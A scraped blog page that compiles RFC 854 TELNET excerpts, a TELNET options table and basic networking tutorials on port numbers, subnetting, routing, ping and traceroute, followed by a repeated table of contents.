      IAC                 255    Data Byte 255.

RFC 854                                                         May 1983

CONNECTION ESTABLISHMENT

   The TELNET TCP connection is established between the user's port U

   and the server's port L.  The server listens on its well known port L

   for such connections.  Since a TCP connection is full duplex and

   identified by the pair of ports, the server can engage in many

   simultaneous connections involving its port L and different user

   ports U.

   Port Assignment

      When used for remote user access to service hosts (i.e., remote

      terminal access) this protocol is assigned server port 23

      (27 octal).  That is L=23.

Comment on RFC 854 Comment on RFC 854

Getting Familiar with TCP/IP Port Numbers

By Dan DiNicolo, April 16th, 2007 Posted in Security.

HTTP (Web servers) – TCP 80
FTP (FTP servers) – TCP 21
SMTP (Email servers) – TCP 25
POP3 (Email servers) – TCP 110
DNS (Name resolution) – UDP 53

Private IP Addresses

By Dan DiNicolo, April 13th, 2007 Posted in Windows XP

10.0.0.1 to 10.255.255.254
172.16.0.1 to 172.31.255.254
192.168.0.1 to 192.168.255.254

TELNET Protocol Overview

The TELNET protocol, designed for terminal-oriented remote login, is documented in RFC 854.

TELNET Options

Protocol   Name                           Number  State Status  RFC STD

========   =====================================  ===== ====== ==== ===

TOPT-BIN   Binary Transmission                 0  Std   Rec     856  27

TOPT-ECHO  Echo                                1  Std   Rec     857  28

TOPT-RECN  Reconnection                        2  Prop  Ele     ...

TOPT-SUPP  Suppress Go Ahead                   3  Std   Rec     858  29

TOPT-APRX  Approx Message Size Negotiation     4  Prop  Ele     ...

TOPT-STAT  Status                              5  Std   Rec     859  30

TOPT-TIM   Timing Mark                         6  Std   Rec     860  31

TOPT-REM   Remote Controlled Trans and Echo    7  Prop  Ele     726

TOPT-OLW   Output Line Width                   8  Prop  Ele     ...

TOPT-OPS   Output Page Size                    9  Prop  Ele     ...

TOPT-OCRD  Output Carriage-Return Disposition 10  Prop  Ele     652

TOPT-OHT   Output Horizontal Tabstops         11  Prop  Ele     653

TOPT-OHTD  Output Horizontal Tab Disposition  12  Prop  Ele     654

TOPT-OFD   Output Formfeed Disposition        13  Prop  Ele     655

TOPT-OVT   Output Vertical Tabstops           14  Prop  Ele     656

TOPT-OVTD  Output Vertical Tab Disposition    15  Prop  Ele     657

TOPT-OLD   Output Linefeed Disposition        16  Prop  Ele     658

TOPT-EXT   Extended ASCII                     17  Prop  Ele     698

TOPT-LOGO  Logout                             18  Prop  Ele     727

TOPT-BYTE  Byte Macro                         19  Prop  Ele     735

TOPT-DATA  Data Entry Terminal                20  Prop  Ele    1043

TOPT-SUP   SUPDUP                             21  Prop  Ele     736

TOPT-SUPO  SUPDUP Output                      22  Prop  Ele     749

TOPT-SNDL  Send Location                      23  Prop  Ele     779

TOPT-TERM  Terminal Type                      24  Prop  Ele    1091

TOPT-EOR   End of Record                      25  Prop  Ele     885

TOPT-TACACS  TACACS User Identification       26  Prop  Ele     927

TOPT-OM    Output Marking                     27  Prop  Ele     933

TOPT-TLN   Terminal Location Number           28  Prop  Ele     946

TOPT-3270  Telnet 3270 Regime                 29  Prop  Ele    1041

TOPT-X.3   X.3 PAD                            30  Prop  Ele    1053

TOPT-NAWS  Negotiate About Window Size        31  Prop  Ele    1073

TOPT-TS    Terminal Speed                     32  Prop  Ele    1079

TOPT-RFC   Remote Flow Control                33  Prop  Ele    1372

TOPT-LINE  Linemode                           34  Draft Ele    1184

TOPT-XDL   X Display Location                 35  Prop  Ele    1096

TOPT-ENVIR Telnet Environment Option          36  Hist  Not    1408

TOPT-AUTH  Telnet Authentication Option       37  Exp   Ele    1416

TOPT-ENVIR Telnet Environment Option          39  Prop  Ele    1572

TOPT-EXTOP Extended-Options-List             255  Std   Rec     861  32

Checking TCP/IP Network Settings with IPCONFIG

By Dan DiNicolo, April 17th, 2007 Posted in Windows Commands.

Classless Inter-Domain Routing (CIDR) aka Supernetting

By Dan DiNicolo, June 2nd, 2006 Posted in CCNA Study Guide Chapter 05.

Figure: Determining CIDR notation based on a subnet mask.

Classless IP Addressing

By Dan DiNicolo, June 2nd, 2006 Posted in CCNA Study Guide Chapter 05.

Communication Across a Simple Routed Network

By Dan DiNicolo, June 28th, 2006 Posted in CCNA Study Guide Chapter 08

Figure: A simple routed internetwork.

Figure: Simple routed network with 1 host on each network.

The first step in the process is the creation of an HTTP request at the Application Layer. In this case, Host A is requesting a web page from Host B. After formatting the HTTP request, the data is passed down to the Transport layer. Remember, our interaction is happening over TCP/IP.
Once the Transport Layer on Host A receives the data, it will add header information that will include the source and destination TCP ports. In this case, the destination TCP port will be 80, and the source port some number above 1024. Once this is complete, the segment will be passed to the Network Layer.
At the Network Layer, the IP header will be added. This header will include a variety of information, but most importantly the source and destination IP addresses. The source address is 192.168.0.99, and the destination address is 10.0.0.100. The next step is passing the packet down to the Data Link layer.
Recall the ANDing process looked at in Chapter 5. This is the process that a host uses to determine whether a destination host is local or remote. In this case, the ANDing results will be different, which means that the destination is on a remote network. When a destination is remote, the packet cannot be sent directly to that host. Instead, it must be first sent to a router.
Pay particular attention to this step. Host A knows that it needs to send this packet to its local router, but the router is not the ultimate destination IP address – 10.0.0.100 (Host B) is. In order to get this data to the router, our host must frame the packet with the destination MAC address – in this case, the MAC address associated with the router’s E0 interface. To obtain this MAC address, it will send out an ARP request looking for the MAC address associated with 192.168.0.1. Once the router responds, Host A will frame the packet. In this case, the source address is the MAC address of Host A, and the destination address is the MAC address of the router’s E0 interface.
Ultimately, this frame will reach interface E0 on the router. The router will notice that the frame is destined for its MAC address, and as such it will process the frame. After calculating the frame’s CRC, it will strip off the frame header and pass the resulting packet up to the Network layer At this point, the router will notice that the destination IP address is not it’s own. When a router receives a packet that is not destined for it specifically, it looks in its routing table to see whether it has a route defined to the destination network. In this case, the router sees that it is directly connected to network 10.0.0.0/8, and also determines that it should forward the packet via interface E1. Before it can forward the packet, however, it has to pass it back down to the Data Link Layer for re-framing.
At the Data Link layer, the router will re-frame the packet with a new header, meaning that source and destination MAC addresses will need to be added. In this case, the source MAC address is now the MAC address of interface E1 on the router. The destination MAC address will be obtained via an ARP request to IP address 10.0.0.100. Once Host B replies with its MAC address, this will be added to the frame as the destination MAC address. The router will then calculate a new CRC for the frame, and forward it through interface E1 as a series of bits.
Eventually the frame will arrive at Host B. By inspecting the destination MAC address, Host B will recognize that the frame is meant for it, calculate the CRC, strip off the framing, and pass it up to the Network Layer.
At the Network Layer, Host B will also recognize its IP address as the destination. This means that it has to process the packet further. In the IP header, it will see that the data should be passed to TCP at the Transport layer.
At the Transport Layer, Host B will look at the destination TCP port, and recognize that the data contained in the segment should be sent to TCP port 80. This is the port on which the web server application is listening for connections.
The web server on Host B will process the HTTP request contained in the data. Ultimately it will need to send a reply, where the whole process happens again, in reverse.

Subnetting IP Networks

By Dan DiNicolo, May 31st, 2001 Posted in Windows 2000.

Decimal 128 64 32 16 8 4 2 1
Binary 1 1 1 1 1 1 1 1

11111111 11111111 11111000 00000000

If the subnet mask in the example above had been /17, or 255.255.128.0, that would leave 15 bits for host addresses. That would mean 2 to the power of 15 minus 2 hosts, or 32766 total.

1 and 1 = 1
1 and 0 = 0
0 and 0 = 0

In our example, this would give us:

IP 10011100 00010001 00101010 00000110

SM11111111 11111111 11110000 00000000

AND 10011100 00010001 00100000 00000000

After we convert our ANDed address back to decimal we get 156.17.32.0. This is the network ID that our host falls onto.

Network ID 10011100 00010001 00100000 00000000

First Valid Host ID 10011100 00010001 00100000 00000001

Last Valid Host ID 10011100 00010001 00101111 11111110

156.17.32.1 to 156.17.47.254

Mask 128 192 224 240 248 252 254 255

Network ID 128 64 32 16 8421

17.12.0.1 to 17.15.255.254

If you go back to the ANDing process, and calculate the first and last host IDs in binary, you’ll see that we’ve come up with the same answer, only much more quickly!

Understanding the Purpose of Subnet Masks

By Dan DiNicolo, April 13th, 2007 Posted in Home Networking

Testing Network Connectivity with the PATHPING Command

By Dan DiNicolo, April 17th, 2007 Posted in Windows Commands

Testing Network Connectivity with the PING Command

By Dan DiNicolo, April 17th, 2007 Posted in Windows Commands

Rather Have Fast and Secure Remote Control?

Securely access PCs and servers worldwide through any firewall. Try it and see for yourself!

The Ping Diagnostic Utility

By Dan DiNicolo, June 26th, 2006 Posted in CCNA Study Guide Chapter 07.

cisco2501#ping ?
WORD Ping destination address or hostname
appletalk Appletalk echo
decnet DECnet echo
ip IP echo
ipx Novell/IPX echo
tag Tag encapsulated IP echo

Assuming that your IP address, subnet mask, and default gateway are correct, attempt to ping a host on a different subnet. If this fails, one possibility is that routing is not configured correctly.
If pinging a remote host fails, attempt to ping your default gateway. If this fails, it may indicate that TCP/IP is not configured correctly on your local router interface, on your host PC, or that the router interface has not been enabled with the no shutdown command.
If pinging your default gateway fails, try pinging your host’s configured IP address. If this fails, it can may mean that you have configured your host PC’s IP address incorrectly, or that TCP/IP is not properly installed or initialized on the host system.
If pinging the host’s IP address fails, try pinging the loopback address – 127.0.0.1. If this fails, it generally indicates that TCP/IP is not properly installed or initialized on your host system.

To test IP connectivity, use the ping command followed by a hostname or IP address.

The ping was successful in this case, as illustrated by the five exclamation points and the final statement. In cases where a ping fails, you’ll see a message similar to the one shown below.

cisco2501#ping 192.168.1.234
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.234, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)

Although generally a TCP/IP utility, ping works with a number of protocols beyond IP and IPX. For a complete list of the protocols that ping supports on your router, issue the command ping ?.

The Traceroute Diagnostic Utility

By Dan DiNicolo, June 26th, 2006 Posted in CCNA Study Guide Chapter 07.

cisco2501#traceroute 192.168.1.209
Type escape sequence to abort.
Tracing the route to 192.168.1.209
1 192.168.1.209 4 msec 40 msec *

As I mentioned previously, traceroute doesn’t provide very much information on our network yet. Once some routing is configured, we’ll be able to see multiple hops in the path to a destination.

Amisauv' Brilliant Blogs

Thursday, June 19, 2008

ALL THE GOOD TWEAKS

ALL THE INTERSTING TWEAKS

VARIOUS IMPORTANT AND INTERESTING TWEAKS !

ALL DOS N ALL COMMANDS

ALL DOS COMMANDS

Windows Networking Utilities

Windows Networking Utilities :

Windows XP Network Diagnostic Tools :

TELNET Protocol :

SUMMARY

MORE INFORMATION

The Network Virtual Terminal :

Commands

Telnet Options

Descriptions of Telnet Options

Suppress Go Ahead

Echo

Linemode

Remote Flow Control

Telnet Control Functions

Interrupt Process

Abort Output

Are You There

Erase character

Erase line

Data Mark

The Telnet Command

APPLIES TO

Getting Familiar with TCP/IP Port Numbers

Private IP Addresses

TELNET Protocol Overview

TELNET Options

Checking TCP/IP Network Settings with IPCONFIG

Classless Inter-Domain Routing (CIDR) aka Supernetting

Classless IP Addressing

Communication Across a Simple Routed Network

Subnetting IP Networks

Understanding the Purpose of Subnet Masks

Testing Network Connectivity with the PATHPING Command

Testing Network Connectivity with the PING Command

The Ping Diagnostic Utility

The Traceroute Diagnostic Utility

Understanding and Configuring DNS Settings

Understanding the Purpose of the Default Gateway

Windows Networking Utilities :

Windows XP Network Diagnostic Tools :

TELNET Protocol :

SUMMARY

MORE INFORMATION

The Network Virtual Terminal :

Commands

Telnet Options

Descriptions of Telnet Options

Suppress Go Ahead

Echo

Linemode

Remote Flow Control

Telnet Control Functions

Interrupt Process

Abort Output

Are You There

Erase character

Erase line

Data Mark

The Telnet Command

APPLIES TO

Getting Familiar with TCP/IP Port Numbers

Private IP Addresses

TELNET Protocol Overview

TELNET Options

Checking TCP/IP Network Settings with IPCONFIG

Classless Inter-Domain Routing (CIDR) aka Supernetting

Classless IP Addressing

Communication Across a Simple Routed Network

Subnetting IP Networks

Understanding the Purpose of Subnet Masks

Testing Network Connectivity with the PATHPING Command

Testing Network Connectivity with the PING Command